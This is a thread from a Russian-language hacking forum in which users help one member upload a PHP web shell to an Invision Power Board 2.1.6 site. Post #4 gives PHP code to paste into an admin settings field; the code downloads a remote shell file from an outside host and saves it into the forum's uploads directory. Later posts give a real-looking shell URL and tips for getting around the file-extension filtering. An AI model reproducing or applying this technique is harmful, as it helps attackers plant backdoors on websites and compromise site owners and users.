HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Ipb 2.1.6 проблема с шеллом
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Ipb 2.1.6 проблема с шеллом
  #1  
Старый 22.11.2006, 02:07
=XSS=
Новичок
Регистрация: 21.11.2006
Сообщений: 11
С нами: 10247292

Репутация: -2
По умолчанию Ipb 2.1.6 проблема с шеллом
IPB 2.1.6
пытаюсь залить на форум шелл через аватары. добавляю расширение .phtml в админке и загружаю шелл как свой аватар.
загружается в папку uploads (пробовал и другие папки) но при обращению к залитому шеллу выходит сообщение

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@.net and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.


Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


--------------------------------------------------------------------------------

Apache/1.3.36 Server


как такое пофиксить?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 22.11.2006, 03:37
=XSS=
Новичок
Регистрация: 21.11.2006
Сообщений: 11
С нами: 10247292

Репутация: -2
По умолчанию
в чем тут дело?
 
Ответить с цитированием

  #3  
Старый 22.11.2006, 08:30
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию
читай error.log, если есть возможность. Там вся инфа об ошибке
 
Ответить с цитированием

  #4  
Старый 22.11.2006, 13:38
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
С нами: 10366322

Репутация: 45
По умолчанию
Попробуй залить вот этим способом у меня всегда получалось.

Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки:" пишем любой php код, на пример такой:
PHP код:
$linky="http://site.ru/shell.txt";
$saved="/usr/home/www/site/public_html/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);

Если не получится почитай статью "Заливаем шелл в Ipb 2.*.*(и больше не спрашиваем)" автор VampiRUS
 
Ответить с цитированием

  #5  
Старый 25.11.2006, 08:27
=XSS=
Новичок
Регистрация: 21.11.2006
Сообщений: 11
С нами: 10247292

Репутация: -2
По умолчанию
ничего из этого не работает.
ввожу этот код - нет загрузки.
 
Ответить с цитированием

  #6  
Старый 25.11.2006, 09:01
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию
Видно, не судьба, видно, не судьба (С)

А вообще нафиг расширение phtml.
Берешь файл shell.php и заливаешь его
 
Ответить с цитированием

  #7  
Старый 25.11.2006, 09:22
=XSS=
Новичок
Регистрация: 21.11.2006
Сообщений: 11
С нами: 10247292

Репутация: -2
По умолчанию
и еще надо писать что-то в полях
Название настройки:
и
Группа настройки:
?

или вообще ничего заполнять не надо?
 
Ответить с цитированием

  #8  
Старый 25.11.2006, 09:27
=XSS=
Новичок
Регистрация: 21.11.2006
Сообщений: 11
С нами: 10247292

Репутация: -2
По умолчанию
_Great_
ты имеешь ввиду через аватары? но тогда надо менять настройки для загружаемого файла .php
и менять MIME-тип файла у php на application/octet-stream
 
Ответить с цитированием

  #9  
Старый 25.11.2006, 09:41
=XSS=
Новичок
Регистрация: 21.11.2006
Сообщений: 11
С нами: 10247292

Репутация: -2
По умолчанию
сейчас такая ситуация:
когда пытаюсь обратиться к шеллу через браузер выходит сообщение

Parse error: syntax error, unexpected $end in /home/site/public_html/forum/uploads/shell.php on line 1078
 
Ответить с цитированием

  #10  
Старый 25.11.2006, 09:46
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
С нами: 10957346

Репутация: 2727


По умолчанию
Цитата:
Сообщение от _Great_  
Видно, не судьба, видно, не судьба (С)

А вообще нафиг расширение phtml.
Берешь файл shell.php и заливаешь его
а ты попробуй..
*.php ибп переименовывает в *.txt..

Цитата:
Сообщение от =XSS=  
ничего из этого не работает.
ввожу этот код - нет загрузки.
$linky="http://site.ru/shell.txt";
$saved="/usr/home/www/site/public_html/forum/uploads/shell.php";

http://site.ru/shell.txt меняешь к примеру на http://grinayxakep.narod.ru/antichat.1.6.php
/usr/home/www/site/public_html/forum/uploads/shell.php меняешь на доступную для записи диру (там где авы доспупно практ. всегда) и все работает..
__________________
ПИУ-ПИУ...
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IPB 2.1.6 Modified for User Database Dump Rst Sploit Driver Уязвимости CMS / форумов 24 20.11.2006 17:47
Уязвимости Ipb 2.1.6 - есть вопрос spheere Уязвимости CMS / форумов 0 27.05.2006 21:16
Проблема с перл Эксплойтом для ipb 2.0.* SURRENDER Уязвимости CMS / форумов 2 07.12.2004 12:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.